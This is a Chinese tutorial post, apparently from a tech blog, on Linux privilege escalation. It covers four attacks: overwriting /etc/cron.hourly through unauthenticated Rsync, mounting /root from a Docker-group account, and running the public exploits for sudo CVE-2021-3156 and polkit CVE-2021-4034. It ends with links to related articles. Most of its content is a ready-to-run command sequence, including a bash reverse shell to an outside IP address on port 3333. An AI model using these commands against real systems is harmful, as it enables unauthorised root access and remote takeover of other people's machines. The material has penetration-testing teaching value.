【权限提升】Linux系统&Docker挂载&Rsync未授权&Sudo-CVE&Polkit-CVE

简介: 【权限提升】Linux系统&Docker挂载&Rsync未授权&Sudo-CVE&Polkit-CVE

Rsync(未授权访问)

Rsync是linux下一款数据备份工具,默认开启873端口

https://vulhub.org/#/environments/rsync/common/

借助Linux默认计划任务调用/etc/cron.hourly,利用rsync连接覆盖

前提:没有账号密码验证 开放873端口


-提权过程:

  1. 创建一个nc文件,内容
    #!/bin/bash
    /bin/bash -i >& /dev/tcp/47.94.236.117/3333 0>&i
  2. 赋予执行权限:chmod +x nc
  3. 上传文件覆盖定时任务目录下rsync -av nc rsync://47.94.236.117:873/src/etc/cron.hourly
  4. 下载文件rsync -av rsync://47.94.236.117:873/src/etc/passwd ./
  5. 进行nc 监听相应的端口nc -lvnp 3333


Docker组挂载

条件:普通用户在docker组,利用docker服务启动镜像挂载目录

从而来访问root目录、etc目录等敏感文件来进行权限提升。


-复现:创建用户归类目录,添加到docker组

useradd -d /home/test -m  test
passwd test
usermod -G docker test
newgrp docker


-利用:

docker run -v /root:/mnt -it alpine

主要的作用是:从Docker上面下载alpine镜像,然后运行;

-v将容器外部的目录/root(其他目录也可以) 挂载到容器内部/mnt,使用-it参数进入容器shell。


补充:拿到普通用户权限后,并且该用户在docker中,意思就是可以控制docker服务

管理员将真实物理机/root目录挂载到容器内部/mnt中,-it参数进入容器shell,


SUDO(CVE-2021-3156)版本

-判断:

sudo: 1.8.2 - 1.8.31p2

sudo: 1.9.0 - 1.9.5p1

sudoedit -s / 报错 则存在


未报错,不存在:

-利用:普通本地用户权限

git clone https://github.com/blasty/CVE-2021-3156.git
cd CVE-2021-3156
make
chmod a+x sudo-hax-me-a-sandwich
./sudo-hax-me-a-sandwich 1


Polkit(CVE-2021-4034)

影响2009年5月至今的所有polkit版本

由于polkit是系统预装工具,所有存在polkit的linux系统均受影响

如:CentOS、Ubuntu、Debian、Redhat、Fedora、Gentoo、Mageia等

-判断:dpkg -l policykit-1

-利用:

git clone https://github.com/berdav/CVE-2021-4034.git
cd CVE-2021-4034/
make
./cve-2021-4034
相关文章
|
7月前
|
Ubuntu Linux Anolis
Linux系统禁用swap
本文介绍了在新版本Linux系统(如Ubuntu 20.04+、CentOS Stream、openEuler等)中禁用swap的两种方法。传统通过注释/etc/fstab中swap行的方式已失效,现需使用systemd管理swap.target服务或在/etc/fstab中添加noauto参数实现禁用。方法1通过屏蔽swap.target适用于新版系统,方法2通过修改fstab挂载选项更通用,兼容所有系统。
657 3
Linux系统禁用swap
|
7月前
|
Linux
Linux系统修改网卡名为eth0、eth1
在Linux系统中,可通过修改GRUB配置和创建Udev规则或使用systemd链接文件,将网卡名改为`eth0`、`eth1`等传统命名方式,适用于多种发行版并支持多网卡配置。
1215 3
|
Ubuntu Linux 网络安全
Linux系统初始化脚本
一款支持Rocky、CentOS、Ubuntu、Debian、openEuler等主流Linux发行版的系统初始化Shell脚本,涵盖网络配置、主机名设置、镜像源更换、安全加固等多项功能,适配单/双网卡环境,支持UEFI引导,提供多版本下载与持续更新。
754 3
Linux系统初始化脚本
|
8月前
|
运维 Linux 开发者
Linux系统中使用Python的ping3库进行网络连通性测试
以上步骤展示了如何利用 Python 的 `ping3` 库来检测网络连通性,并且提供了基本错误处理方法以确保程序能够优雅地处理各种意外情形。通过简洁明快、易读易懂、实操性强等特点使得该方法非常适合开发者或系统管理员快速集成至自动化工具链之内进行日常运维任务之需求满足。
579 18
|
7月前
|
安全 Linux Shell
Linux系统提权方式全面总结:从基础到高级攻防技术
本文全面总结Linux系统提权技术,涵盖权限体系、配置错误、漏洞利用、密码攻击等方法,帮助安全研究人员掌握攻防技术,提升系统防护能力。
907 1
|
7月前
|
监控 安全 Linux
Linux系统提权之计划任务(Cron Jobs)提权
在Linux系统中,计划任务(Cron Jobs)常用于定时执行脚本或命令。若配置不当,攻击者可利用其提权至root权限。常见漏洞包括可写的Cron脚本、目录、通配符注入及PATH变量劫持。攻击者通过修改脚本、创建恶意任务或注入命令实现提权。系统管理员应遵循最小权限原则、使用绝对路径、避免通配符、设置安全PATH并定期审计,以防范此类攻击。
1272 1
|
8月前
|
缓存 监控 Linux
Linux系统清理缓存(buff/cache)的有效方法。
总结而言,在大多数情形下你不必担心Linux中buffer与cache占用过多内存在影响到其他程序运行;因为当程序请求更多内存在没有足够可用资源时,Linux会自行调整其占有量。只有当你明确知道当前环境与需求并希望立即回收这部分资源给即将运行重负载任务之前才考虑上述方法去主动干预。
2237 10
|
Linux Windows
Linux权限命令详解(二)
Linux权限命令详解(二)
|
安全 Linux 开发工具
Linux权限命令详解(一)
Linux权限命令详解(一)
|
Linux 数据安全/隐私保护
Linux 权限常用命令
【2月更文挑战第8天】
245 2
Linux 权限常用命令
下一篇
开通oss服务